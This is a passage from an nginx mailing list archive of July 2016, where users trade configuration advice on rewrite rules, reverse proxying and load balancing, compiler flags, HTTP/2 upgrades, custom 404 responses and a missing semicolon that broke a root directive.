>> RewriteCond %{DOCUMENT_ROOT}/$3 -f
>> RewriteRule ^(.*?)/(.*?)/(.*)$ /$3
>>
>> I tried these options but it seems not working:
>>
>> if (-f $document_root/$3){
>> set $rule_0 1$rule_0;
>> }
>> if ($rule_0 = "1"){
>> rewrite ^/(.*?)/(.*?)/(.*)$ /$3;
>> }
>>
>> Anyone have a good idea?
>>
>> Cheers
>>
>> Daniel
>>
>> _______________________________________________
>> nginx mailing list
>> nginx at nginx.org
>> http://mailman.nginx.org/mailman/listinfo/nginx
>
> how about
>
> location ~ ^/(.*?)/(.*?)/(.*)$ {
>     try_files /$3 $uri =404;
> }
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

From weijiesheng at gmail.com Thu Jul 7 20:08:01 2016
From: weijiesheng at gmail.com (Jason/Jiesheng Wei)
Date: Thu, 7 Jul 2016 13:08:01 -0700
Subject: nginx as the proxy that provides client certificate and faced connection attempt failed talk to upstream server
Message-ID:

Hey, I'm using nginx for windows as a reverse proxy to upstream server.
The upstream server requires client certificate and thus in the nginx config, I put the following: location / { proxy_ssl_certificate_key cert.key; proxy_ssl_certificate cert.crt; proxy_pass https://upstream; } and the key and cert are pem format. However, when I send request to the nginx proxy, it returns 504 gateway timeout and the error log is 10060: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond) while reading response header from upstream And I confirmed by curl with the cert files above directly to the upstream and it worked. Can someone please help understand what could be wrong here? Thanks, Jason From francis at daoine.org Fri Jul 8 07:38:36 2016 From: francis at daoine.org (Francis Daly) Date: Fri, 8 Jul 2016 08:38:36 +0100 Subject: Rewrite Rules from apache In-Reply-To: <2183559E-5AA9-4485-899C-465BDDE364F4@linux-nerd.de> References: <2183559E-5AA9-4485-899C-465BDDE364F4@linux-nerd.de> Message-ID: <20160708073836.GL12280@daoine.org> On Thu, Jul 07, 2016 at 06:49:21PM +0200, Daniel wrote: Hi there, > This is my htaccess Rule: > > RewriteCond %{DOCUMENT_ROOT}/$3 -f > RewriteRule ^(.*?)/(.*?)/(.*)$ /$3 I suspect that some previous part of the htaccess file has a regex which sets $3. What is that? Or, alternatively: What http request do you make? What response do you want? As in, what file on your filesystem do you want nginx to return, for this request? 
f -- Francis Daly francis at daoine.org From kerozin.joe at gmail.com Fri Jul 8 12:44:00 2016 From: kerozin.joe at gmail.com (=?UTF-8?Q?Lantos_Istv=C3=A1n?=) Date: Fri, 8 Jul 2016 14:44:00 +0200 Subject: Optimization flags Message-ID: The default --with-cc-opt flags for Nginx are these: *--with-cc-opt='-g -O2 -fstack-protector-strong -Wformat > -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2'* > However I added more optimizations, which are against the standard: *--with-cc-opt='-g -Ofast -march=native -ffast-math > -fstack-protector-strong -Wformat -Werror=format-security > -Wp,-D_FORTIFY_SOURCE=2'* > So far I don't experience any bug, but I do have a higher benchmark: 380-450 req/s compared to the original 290-310 req/s with cached Node/Express app on my laptop. Is it safe to use -O3 or -Ofast flags with Nginx? Is it possible to build Nginx with clang? If so, should I symlink it to gcc (I use Docker, this way gcc executable is trashed) or is there a way to define the compiler with a flag? -------------- next part -------------- An HTML attachment was scrubbed... URL: From kerozin.joe at gmail.com Fri Jul 8 13:19:18 2016 From: kerozin.joe at gmail.com (=?UTF-8?Q?Lantos_Istv=C3=A1n?=) Date: Fri, 8 Jul 2016 15:19:18 +0200 Subject: Optimization flags In-Reply-To: References: Message-ID: Seems like --with-cc=clang flag is where I can define clang compiler. Is it safe to use with --with-cc-opt='-std=c11 ...? I think clang uses C11 anyway. 
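For reference, the two configure options discussed in this thread combine along these lines. This is only a sketch, not a tested build recipe — the -cc-opt flag set shown is the default one quoted earlier in the thread, and any site-specific --with-* module flags are omitted:

```sh
# Build nginx with clang instead of symlinking it over gcc:
# --with-cc selects the compiler, --with-cc-opt appends compiler flags.
./configure \
    --with-cc=clang \
    --with-cc-opt='-g -O2 -fstack-protector-strong -Wformat -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2'
```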
2016-07-08 14:44 GMT+02:00 Lantos Istv?n : > The default --with-cc-opt flags for Nginx are these: > > *--with-cc-opt='-g -O2 -fstack-protector-strong -Wformat >> -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2'* >> > > However I added more optimizations, which are against the standard: > > *--with-cc-opt='-g -Ofast -march=native -ffast-math >> -fstack-protector-strong -Wformat -Werror=format-security >> -Wp,-D_FORTIFY_SOURCE=2'* >> > > So far I don't experience any bug, but I do have a higher benchmark: > 380-450 req/s compared to the original 290-310 req/s with cached > Node/Express app on my laptop. > > Is it safe to use -O3 or -Ofast flags with Nginx? > > Is it possible to build Nginx with clang? If so, should I symlink it to > gcc (I use Docker, this way gcc executable is trashed) or is there a way to > define the compiler with a flag? > -------------- next part -------------- An HTML attachment was scrubbed... URL: From vbart at nginx.com Fri Jul 8 13:20:58 2016 From: vbart at nginx.com (Valentin V. Bartenev) Date: Fri, 08 Jul 2016 16:20:58 +0300 Subject: Optimization flags In-Reply-To: References: Message-ID: <3482025.ZJ7sBQaieg@vbart-workstation> On Friday 08 July 2016 14:44:00 Lantos Istv?n wrote: > The default --with-cc-opt flags for Nginx are these: > > *--with-cc-opt='-g -O2 -fstack-protector-strong -Wformat > > -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2'* > > > > However I added more optimizations, which are against the standard: > > *--with-cc-opt='-g -Ofast -march=native -ffast-math > > -fstack-protector-strong -Wformat -Werror=format-security > > -Wp,-D_FORTIFY_SOURCE=2'* > > > > So far I don't experience any bug, but I do have a higher benchmark: > 380-450 req/s compared to the original 290-310 req/s with cached > Node/Express app on my laptop. > > Is it safe to use -O3 or -Ofast flags with Nginx? Usually it is safe. You can run tests: http://hg.nginx.org/nginx-tests/ > > Is it possible to build Nginx with clang? 
If so, should I symlink it to gcc > (I use Docker, this way gcc executable is trashed) or is there a way to > define the compiler with a flag? --with-cc= wbr, Valentin V. Bartenev From kerozin.joe at gmail.com Fri Jul 8 13:22:11 2016 From: kerozin.joe at gmail.com (=?UTF-8?Q?Lantos_Istv=C3=A1n?=) Date: Fri, 8 Jul 2016 15:22:11 +0200 Subject: Optimization flags In-Reply-To: <3482025.ZJ7sBQaieg@vbart-workstation> References: <3482025.ZJ7sBQaieg@vbart-workstation> Message-ID: Thank You! 2016-07-08 15:20 GMT+02:00 Valentin V. Bartenev : > On Friday 08 July 2016 14:44:00 Lantos Istv?n wrote: > > The default --with-cc-opt flags for Nginx are these: > > > > *--with-cc-opt='-g -O2 -fstack-protector-strong -Wformat > > > -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2'* > > > > > > > However I added more optimizations, which are against the standard: > > > > *--with-cc-opt='-g -Ofast -march=native -ffast-math > > > -fstack-protector-strong -Wformat -Werror=format-security > > > -Wp,-D_FORTIFY_SOURCE=2'* > > > > > > > So far I don't experience any bug, but I do have a higher benchmark: > > 380-450 req/s compared to the original 290-310 req/s with cached > > Node/Express app on my laptop. > > > > Is it safe to use -O3 or -Ofast flags with Nginx? > > Usually it is safe. You can run tests: http://hg.nginx.org/nginx-tests/ > > > > > Is it possible to build Nginx with clang? If so, should I symlink it to > gcc > > (I use Docker, this way gcc executable is trashed) or is there a way to > > define the compiler with a flag? > > --with-cc= > > wbr, Valentin V. Bartenev > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From kerozin.joe at gmail.com Fri Jul 8 21:10:04 2016 From: kerozin.joe at gmail.com (=?UTF-8?Q?Lantos_Istv=C3=A1n?=) Date: Fri, 8 Jul 2016 23:10:04 +0200 Subject: Optimization flags In-Reply-To: References: <3482025.ZJ7sBQaieg@vbart-workstation> Message-ID: I made a non-scientific benchmark on my laptop with my project. Although jumping from -O2 to -Ofast giving me dramatic speed boost, it's interesting to see that going from gcc-4.9 to clang-3.9, there's no difference, just margin of error. The test is non-scientific, I worked on my PC at midday on raw pictures, lots of programs open, but still, those readings almost identical. My verdict is there's no reason to introduce clang into my Docker build, because doesn't make any speed difference. Going from -O2 to -Ofast makes. 290-310req/s vs 380-450 req/s. 2016-07-08 15:22 GMT+02:00 Lantos Istv?n : > Thank You! > > 2016-07-08 15:20 GMT+02:00 Valentin V. Bartenev : > >> On Friday 08 July 2016 14:44:00 Lantos Istv?n wrote: >> > The default --with-cc-opt flags for Nginx are these: >> > >> > *--with-cc-opt='-g -O2 -fstack-protector-strong -Wformat >> > > -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2'* >> > > >> > >> > However I added more optimizations, which are against the standard: >> > >> > *--with-cc-opt='-g -Ofast -march=native -ffast-math >> > > -fstack-protector-strong -Wformat -Werror=format-security >> > > -Wp,-D_FORTIFY_SOURCE=2'* >> > > >> > >> > So far I don't experience any bug, but I do have a higher benchmark: >> > 380-450 req/s compared to the original 290-310 req/s with cached >> > Node/Express app on my laptop. >> > >> > Is it safe to use -O3 or -Ofast flags with Nginx? >> >> Usually it is safe. You can run tests: http://hg.nginx.org/nginx-tests/ >> >> > >> > Is it possible to build Nginx with clang? If so, should I symlink it to >> gcc >> > (I use Docker, this way gcc executable is trashed) or is there a way to >> > define the compiler with a flag? >> >> --with-cc= >> >> wbr, Valentin V. 
Bartenev >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: clang-vs-gcc.png Type: image/png Size: 54606 bytes Desc: not available URL: From nginx-forum at forum.nginx.org Fri Jul 8 21:55:04 2016 From: nginx-forum at forum.nginx.org (ZaneCEO) Date: Fri, 08 Jul 2016 17:55:04 -0400 Subject: Issue with HTTP/2 and async file upload from Safari on iOS In-Reply-To: References: Message-ID: Hi guys, that's the issue for me: I'm with Ubuntu 16.04 official packages. I apt dist-upgrade, but still I'm on nginx/1.10.0.. Any solution other than switching to https://launchpad.net/~nginx/+archive/ubuntu/development (wich scares the skull out of me, since this is a production server)? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,267385,268204#msg-268204 From nginx-forum at forum.nginx.org Fri Jul 8 22:35:26 2016 From: nginx-forum at forum.nginx.org (itpp2012) Date: Fri, 08 Jul 2016 18:35:26 -0400 Subject: Issue with HTTP/2 and async file upload from Safari on iOS In-Reply-To: References: Message-ID: <2d76d90751234e0f9a157d8b92915669.NginxMailingListEnglish@forum.nginx.org> You can manually apply the patches and recompile. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,267385,268205#msg-268205 From luky-37 at hotmail.com Sat Jul 9 10:25:50 2016 From: luky-37 at hotmail.com (Lukas Tribus) Date: Sat, 9 Jul 2016 10:25:50 +0000 Subject: AW: Issue with HTTP/2 and async file upload from Safari on iOS In-Reply-To: References: , Message-ID: > Any solution other than switching to > https://launchpad.net/~nginx/+archive/ubuntu/development (wich scares the > skull out of me, since this is a production server)? 
Use nginx provided binaries if compiling from source is not an option:
http://nginx.org/en/linux_packages.html#mainline

From nginx-forum at forum.nginx.org Sat Jul 9 15:23:41 2016
From: nginx-forum at forum.nginx.org (bai030805)
Date: Sat, 09 Jul 2016 11:23:41 -0400
Subject: Set up reverse proxy and loadbalancing without hostname
Message-ID:

Hi Gurus

My lab environment is

Nginx IP: 192.168.16.206
Four Web Servers: 192.168.16.201-204

My nginx.conf is

http {
    upstream myapp1 {
        server 192.168.16.201;
        server 192.168.16.202;
        server 192.168.16.203;
        server 192.168.16.204;
    }
    server {
        listen 80;
        location / {
            proxy_pass http://myapp1;
        }
    }
}

From the web browser, I use http://192.168.16.206 to access the web server. The web browser redirects "http://192.168.16.206" to "https://myapp1/", and then I get the error "myapp1's server DNS address could not be found."

Could you please give me some suggestions about this? Thanks so much for your feedback.

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268209,268209#msg-268209

From dewanggaba at xtremenitro.org Sat Jul 9 15:28:44 2016
From: dewanggaba at xtremenitro.org (Dewangga Alam)
Date: Sat, 9 Jul 2016 22:28:44 +0700
Subject: Set up reverse proxy and loadbalancing without hostname
In-Reply-To: References: Message-ID: <5a1d1743-8841-02f3-e712-77e24387695c@xtremenitro.org>

Hello!

On 7/9/2016 10:23 PM, bai030805 wrote:
> Hi Gurus
>
> My lab environment is
>
> Nginx IP: 192.168.16.206
> Four Web Servers: 192.168.16.201-204
>
> My nginx.conf is
>
> http {
>     upstream myapp1 {
>         server 192.168.16.201;
>         server 192.168.16.202;
>         server 192.168.16.203;
>         server 192.168.16.204;
>     }
>     server {
>         listen 80;
>         location / {
>             proxy_pass http://myapp1;
>         }
>     }
> }

Have you tried using `proxy_redirect off;` under your proxy_pass configuration?

> From the web browser, I use http://192.168.16.206 to access the web server.
> The web browser redirects "http://192.168.16.206" to "https://myapp1/", and then I get the error "myapp1's server DNS address could not be found."
>
> Could you please give me some suggestions about this? Thanks so much for your feedback.
>
> Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268209,268209#msg-268209
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx

From francis at daoine.org Sat Jul 9 16:26:32 2016
From: francis at daoine.org (Francis Daly)
Date: Sat, 9 Jul 2016 17:26:32 +0100
Subject: Set up reverse proxy and loadbalancing without hostname
In-Reply-To: References: Message-ID: <20160709162632.GM12280@daoine.org>

On Sat, Jul 09, 2016 at 11:23:41AM -0400, bai030805 wrote:

Hi there,

> Nginx IP: 192.168.16.206
> Four Web Servers: 192.168.16.201-204

Is there one Host: header that you can send in requests to each of the four web servers, so that they will all return the content that you want?

If so, use that. If not, send none. That is...

> location / {
> proxy_pass http://myapp1;

nginx will make a request of the upstream server including "Host: myapp1". You can change that by using "proxy_set_header Host" with your preferred name. (Or you can use that name instead of "myapp1" here, and in the "upstream" definition.) Possibly proxy_set_header Host ""; is what you want here.

Depending on what your upstream servers send, you may need more config in nginx to get everything to work the way that you want it to.

> }
> }
>
> From the web browser, I use http://192.168.16.206 to access the web server. The web browser redirects "http://192.168.16.206" to "https://myapp1/"

If there really is a switch from http to https, that suggests that something extra is happening.

What response do you get from curl -v -H Host:myapp1 http://192.168.16.201/ ? Because that is more-or-less the request that nginx makes.
Good luck with it, f -- Francis Daly francis at daoine.org From pratyush at hostindya.com Sat Jul 9 17:51:53 2016 From: pratyush at hostindya.com (Pratyush Kumar) Date: Sat, 09 Jul 2016 17:51:53 +0000 Subject: Set up reverse proxy and loadbalancing without hostname In-Reply-To: <20160709162632.GM12280@daoine.org> References: <20160709162632.GM12280@daoine.org> Message-ID: Hi there try this http { upstream myapp1 { server 192.168.16.201; server 192.168.16.202; server 192.168.16.203; server 192.168.16.204; } server { listen 80; location / { proxy_pass http://myapp1/; proxy_set_header Host $host; #proxy_redirect https://myapp1/ http://$host/; } } } Basically "proxy_set_header Host $host;" is passing the host name as seen by nginx to the upstream servers, so any redirect originating at upstream will redirect to the same host which it was called with. without this statement upstream servers sees host name as myapp1 which nginx uses to request them. If this one doesn't work as expected you might like to un-comment "#proxy_redirect https://myapp1 (https://myapp1/) http://$host/;" line, although in my opinion it wont be necessary. Regards Pratyush Kumar http://erpratyush.me (http://erpratyush.me) live and let live go vegan July 9 2016 9:56 PM, "Francis Daly" wrote:On Sat, Jul 09, 2016 at 11:23:41AM -0400, bai030805 wrote: Hi there, Nginx IP: 192.168.16.206 Four Web Server: 192.168.16.201-204 Is there one Host: header that you can send in requests to each of the four web servers, so that they will all return the content that you want? If so, use that. If not, send none. That is... location / { proxy_pass http://myapp1 (http://myapp1); nginx will make a request of the upstream server including "Host: myapp1". You can change that by using "proxy_set_header Host" with your preferred name. (Or you can use that name instead of "myapp1" here, and in the "upstream" definition.) Possibly proxy_set_header Host ""; is what you want here. 
Depending on what your upstream servers send, you may need more config in nginx to get everything to work the way that you want it to. } } from web brower, i use http://192.168.16.206 to access the web server. the web brower redirect "http://192.168.16.206" to "https://myapp1 (https://myapp1)" If there really is a switch from http to https, that suggests that something extra is happening. What response do you get from curl -v -H Host:myapp1 http://192.168.16.201/ ? Because that is more-or-less the request than nginx makes. Good luck with it, f -- Francis Daly francis at daoine.org (mailto:francis at daoine.org) _______________________________________________ nginx mailing list nginx at nginx.org (mailto:nginx at nginx.org) http://mailman.nginx.org/mailman/listinfo/nginx (http://mailman.nginx.org/mailman/listinfo/nginx) -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Sun Jul 10 14:41:07 2016 From: nginx-forum at forum.nginx.org (bai030805) Date: Sun, 10 Jul 2016 10:41:07 -0400 Subject: Set up reverse proxy and loadbalancing without hostname In-Reply-To: References: Message-ID: Hi All thanks so much for your help!!! Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268209,268228#msg-268228 From nginx-forum at forum.nginx.org Mon Jul 11 08:25:07 2016 From: nginx-forum at forum.nginx.org (ZaneCEO) Date: Mon, 11 Jul 2016 04:25:07 -0400 Subject: AW: Issue with HTTP/2 and async file upload from Safari on iOS In-Reply-To: References: Message-ID: @itpp2012 : building from source is a no-go for me due to future upgrade concerns @Lukas : will follow your suggestion and try the ngingx-provided bins, thanks! Posted at Nginx Forum: https://forum.nginx.org/read.php?2,267385,268236#msg-268236 From nginx-forum at forum.nginx.org Mon Jul 11 13:40:45 2016 From: nginx-forum at forum.nginx.org (leeand00) Date: Mon, 11 Jul 2016 09:40:45 -0400 Subject: Insert Variable Values when loading a Cloud Config? 
Message-ID: <4dd49d1c98803d2de518907148bfcd0a.NginxMailingListEnglish@forum.nginx.org> I asked a question on another site (http://stackoverflow.com/questions/37032806/does-bare-metal-coreos-etcd2-support-the-templating-feature-of-coreos-cloudinit) about loading a cloud config from nginx onto a bare-metal core-os machine. The question involves trying to have nginx fill in the variables for the $private_ipv4 and $public_ipv4 when a config is loaded up. Does this require that I use php-fpm to somehow recognize the machine sending the request, and then fill in the variables when the cloud-config is requested? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268241,268241#msg-268241 From nginx-forum at forum.nginx.org Mon Jul 11 16:34:13 2016 From: nginx-forum at forum.nginx.org (matt_l) Date: Mon, 11 Jul 2016 12:34:13 -0400 Subject: One goal. 2 settings. Which one would you recommend? Message-ID: <940a78d1eb43551aa11b11ff74a56799.NginxMailingListEnglish@forum.nginx.org> Hi I am debating what is a better setting between the 2 settings below. Setting#1 and Setting#2 attempt to do the same task (flow control by controlling the IP sources). Setting#1 uses one machine and Setting#2 uses 2 machines in a cascading manner. Thank you for your help 1. Setting #1 1 machine with N CPU =========================== [...] upstream dynamic { least_conn; server XXX.XXX.XXX.XXX:9990; [?] 
keepalive 5; } upstream locallayer { server 127.0.0.1:7999; keepalive 200; } limit_conn_zone $binary_remote_addr zone=peripconn:100m; limit_req_zone $binary_remote_addr zone=peripreq:1000m rate=30000r/s; server { listen 7999; server_name local.com; proxy_intercept_errors on; location / { limit_conn peripconn 160; limit_req zone=peripreq burst=100 nodelay; limit_conn_status 503; limit_req_status 503; proxy_http_version 1.1; proxy_set_header Connection ""; proxy_connect_timeout 10ms; proxy_send_timeout 10ms; proxy_read_timeout 60ms; proxy_pass http://dynamic; } error_page 302 400 403 404 408 500 502 503 504 = /empty; location /empty { return 204; } } server { listen 8002; proxy_intercept_errors on; location / { limit_conn peripex 5; limit_conn_status 503; proxy_http_version 1.1; proxy_set_header Connection ""; proxy_pass http://locallayer; } error_page 302 400 403 404 408 500 502 503 504 = /empty; location /empty { return 204; } } [...] 2. Setting #2 2 machines each N/2 CPU ============================== - Machine #1: [...] upstream machine2 { least_conn; server ip/of/machine2:7999; keepalive 200; } server { listen 8002; proxy_intercept_errors on; location / { limit_conn peripex 5; limit_conn_status 503; proxy_http_version 1.1; proxy_set_header Connection ""; proxy_pass http://machine2; } error_page 302 400 403 404 408 500 502 503 504 = /empty; location /empty { return 204; } } [...] - Machine #2: [...] upstream dynamic { least_conn; server XXX.XXX.XXX.XXX:9990; [?] 
keepalive 5; } limit_conn_zone $binary_remote_addr zone=peripconn:100m; limit_req_zone $binary_remote_addr zone=peripreq:1000m rate=30000r/s; server { listen 7999; server_name local.com; proxy_intercept_errors on; location / { limit_conn peripconn 160; limit_req zone=peripreq burst=100 nodelay; limit_conn_status 503; limit_req_status 503; proxy_http_version 1.1; proxy_set_header Connection ""; proxy_connect_timeout 10ms; proxy_send_timeout 10ms; proxy_read_timeout 60ms; proxy_pass http://dynamic; } error_page 302 400 403 404 408 500 502 503 504 = /empty; location /empty { return 204; } } [...] Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268243,268243#msg-268243 From francis at daoine.org Mon Jul 11 18:31:06 2016 From: francis at daoine.org (Francis Daly) Date: Mon, 11 Jul 2016 19:31:06 +0100 Subject: Insert Variable Values when loading a Cloud Config? In-Reply-To: <4dd49d1c98803d2de518907148bfcd0a.NginxMailingListEnglish@forum.nginx.org> References: <4dd49d1c98803d2de518907148bfcd0a.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20160711183106.GN12280@daoine.org> On Mon, Jul 11, 2016 at 09:40:45AM -0400, leeand00 wrote: Hi there, > The question involves trying to have nginx fill in the variables for the > $private_ipv4 and $public_ipv4 when a config is loaded up. Does this > require that I use php-fpm to somehow recognize the machine sending the > request, and then fill in the variables when the cloud-config is requested? I think that the nginx side of the question is: A file exists on the filesystem. A request is made for the matching url. Can nginx return the file contents, making some textual substitutions in the file contents? If that is the question, then the answers probably involves: does nginx know what the desired substitutions are? (As in, where do the suitable values for $private_ipv4 and $public_ipv4 come from?) If nginx can know, then probably the sub_filter module (http://nginx.org/r/sub_filter) can help. 
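Following up on the sub_filter suggestion, here is a minimal sketch of what such a setup could look like. Everything in it is an assumption for illustration — the file name, the root path, the replacement addresses, and the geo trick for producing a literal "$" (since "$" starts a variable in nginx config strings):

```nginx
# A variable that expands to a single dollar sign, so the literal
# placeholder "$private_ipv4" can be written in sub_filter without
# nginx trying to expand it as one of its own variables.
geo $dollar {
    default "$";
}

server {
    listen 80;

    # Hypothetical path of the cloud-config template on disk.
    location = /cloud-config.yml {
        root /var/www/configs;
        default_type text/plain;
        sub_filter_types text/plain;   # sub_filter only rewrites text/html by default
        sub_filter_once off;           # replace every occurrence, not just the first
        sub_filter '${dollar}private_ipv4' '10.0.0.5';     # illustrative addresses
        sub_filter '${dollar}public_ipv4'  '203.0.113.10';
    }
}
```

Note that sub_filter accepts variables in both arguments only in nginx 1.9.4 and later, and the replacement values here would still need to come from somewhere (a map on the client address, for example) rather than being hard-coded.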
You may need to check that you can include a literal $ in the string to replace, but that should be a straightforward enough test after you know that nginx can know what the replacement strings are.

If sub_filter is not suitable, then you could use any other active content system (such as php-fpm) to do the work. The details will matter.

Good luck with it,

f
--
Francis Daly        francis at daoine.org

From nginx at 2xlp.com Mon Jul 11 19:26:30 2016
From: nginx at 2xlp.com (Jonathan Vanasco)
Date: Mon, 11 Jul 2016 15:26:30 -0400
Subject: forced 404 without a location display ?
Message-ID: <6120616F-3CA5-4629-AABE-608D2E977A38@2xlp.com>

I have some servers where I use an old method of gating a path by using a file check.

This allows staff to turn off certain locations during migrations/updates without having root privileges (needed to restart nginx).

An issue I noticed: this method now (perhaps always) shows the name of the location on the default 404 template [the response that nginx generates via code, not a template on the fs].

Does anyone know how to disable showing the location without defining a custom template on the filesystem? Or perhaps someone can think of a better way to accomplish my goals?

location /paths/to/ {
    if (!-f /etc/nginx/_flags/is_running) {
        rewrite ^.*$ @is_running break;
    }
}
location = @is_running {
    return 404;
}

=======
that generates this:

404 Not Found

The resource could not be found.
/@is_running From oleg at mamontov.net Mon Jul 11 20:25:34 2016 From: oleg at mamontov.net (Oleg A. Mamontov) Date: Mon, 11 Jul 2016 23:25:34 +0300 Subject: forced 404 without a location display ? In-Reply-To: <6120616F-3CA5-4629-AABE-608D2E977A38@2xlp.com> References: <6120616F-3CA5-4629-AABE-608D2E977A38@2xlp.com> Message-ID: <20160711202534.GF19996@xenon.mamontov.net> On Mon, Jul 11, 2016 at 03:26:30PM -0400, Jonathan Vanasco wrote: > I have some servers where I use an old method of gating a path by using a file check. > > this allows staff to turn off certain locations during migrations/updates without having root privileges (needed to restart nginx) > > an issue I noticed? this method now (perhaps always) shows the name of the location on the default 404 template [the response that nginx generates via code, not a template on the fs] > > Does anyone know how to disable showing the location without defining a custom template on the filesystem? or perhaps someone can think of a better way to accomplish my goals? > > > > location /paths/to/ { > if (!-f /etc/nginx/_flags/is_running) { > rewrite ^.*$ @is_running break; > } > } > location = @is_running { > return 404; > } > > ======= > that generates this > > > > > 404 Not Found > > >
> 404 Not Found
>
> The resource could not be found.
>
> /@is_running > > > > ============================================= location /paths/to/ { if ( !-f /etc/nginx/_flags/is_running ) { rewrite ^ /is_running last; } } location = /is_running { internal; return 404 'nothing\n'; } ============================================= Does it work for you? -- Cheers, Oleg A. Mamontov mailto: oleg at mamontov.net skype: lonerr11 cell: +7 (903) 798-1352 From mdounin at mdounin.ru Mon Jul 11 20:27:57 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 11 Jul 2016 23:27:57 +0300 Subject: forced 404 without a location display ? In-Reply-To: <6120616F-3CA5-4629-AABE-608D2E977A38@2xlp.com> References: <6120616F-3CA5-4629-AABE-608D2E977A38@2xlp.com> Message-ID: <20160711202757.GI57459@mdounin.ru> Hello! On Mon, Jul 11, 2016 at 03:26:30PM -0400, Jonathan Vanasco wrote: > I have some servers where I use an old method of gating a path > by using a file check. > > this allows staff to turn off certain locations during > migrations/updates without having root privileges (needed to > restart nginx) > > an issue I noticed? this method now (perhaps always) shows the > name of the location on the default 404 template [the response > that nginx generates via code, not a template on the fs] > > Does anyone know how to disable showing the location without > defining a custom template on the filesystem? or perhaps > someone can think of a better way to accomplish my goals? > > > > location /paths/to/ { > if (!-f /etc/nginx/_flags/is_running) { > rewrite ^.*$ @is_running break; > } > } > location = @is_running { > return 404; > } > > ======= > that generates this > > > > > 404 Not Found > > >
> 404 Not Found
>
> The resource could not be found.
>
> /@is_running > > > > This is not something nginx generates. An nginx-generated error will look like: 404 Not Found
404 Not Found

nginx/1.11.3
No location information is added by nginx to error pages, and never was. You are probably using something with 3rd party patches. An obvious fix is to switch to using vanilla nginx instead, it can be downloaded here: http://nginx.org/en/download.html -- Maxim Dounin http://nginx.org/ From nginx-forum at forum.nginx.org Tue Jul 12 01:24:11 2016 From: nginx-forum at forum.nginx.org (leeand00) Date: Mon, 11 Jul 2016 21:24:11 -0400 Subject: Insert Variable Values when loading a Cloud Config? In-Reply-To: <20160711183106.GN12280@daoine.org> References: <20160711183106.GN12280@daoine.org> Message-ID: This is just a guess, but probably a hashap...or maybe a DNS server that assigns them statically. But I suppose CoreOS has to request it from nginx, so it could probably even just pull it out of the request. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268241,268250#msg-268250 From nginx-forum at forum.nginx.org Tue Jul 12 14:47:56 2016 From: nginx-forum at forum.nginx.org (reaper) Date: Tue, 12 Jul 2016 10:47:56 -0400 Subject: nginx not using root from location Message-ID: Hello. I'm obviously missing something but I'm not quite sure what. Here's one of my vhosts. server { listen 80; server_name test.local; access_log /var/log/nginx/access.log; root /data/www/htdocs/web; location / { index index.php; } location /testlocation { index index.html root /data/www/htdocs/test; } } When I try to get index.html from /testlocation I always get 404 with message in errorlog that file is missing in /data/www/htdocs/web. Why? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268258,268258#msg-268258 From shivamnindrajog at gmail.com Tue Jul 12 16:46:43 2016 From: shivamnindrajog at gmail.com (Shivam Nanda) Date: Tue, 12 Jul 2016 22:16:43 +0530 Subject: nginx not using root from location In-Reply-To: References: Message-ID: Hi Reaper please check the following: 1. check the permissions of the folders. 2. define both root directive in the location. 
restart the nginx service and share the results. Thanks Shivam On 12 Jul 2016 20:18, "reaper" wrote: > Hello. I'm obviously missing something but I'm not quite sure what. > > Here's one of my vhosts. > > server { > listen 80; > server_name test.local; > > access_log /var/log/nginx/access.log; > > root /data/www/htdocs/web; > > location / { > index index.php; > } > > location /testlocation { > index index.html > root /data/www/htdocs/test; > } > } > > When I try to get index.html from /testlocation I always get 404 with > message in errorlog that file is missing in /data/www/htdocs/web. Why? > > Posted at Nginx Forum: > https://forum.nginx.org/read.php?2,268258,268258#msg-268258 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Tue Jul 12 17:30:08 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 12 Jul 2016 18:30:08 +0100 Subject: nginx not using root from location In-Reply-To: References: Message-ID: <20160712173008.GO12280@daoine.org> On Tue, Jul 12, 2016 at 10:47:56AM -0400, reaper wrote: Hi there, > Hello. I'm obviously missing something but I'm not quite sure what. You don't have a "root" directive inside the location. Your "index" directive as-written has three arguments, although you want it to only have one. > location /testlocation { > index index.html > root /data/www/htdocs/test; > } Add a semicolon to tell nginx that your "index" directive is complete. f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Tue Jul 12 19:47:23 2016 From: nginx-forum at forum.nginx.org (reaper) Date: Tue, 12 Jul 2016 15:47:23 -0400 Subject: nginx not using root from location In-Reply-To: <20160712173008.GO12280@daoine.org> References: <20160712173008.GO12280@daoine.org> Message-ID: Yes! That was it. Thank you. 
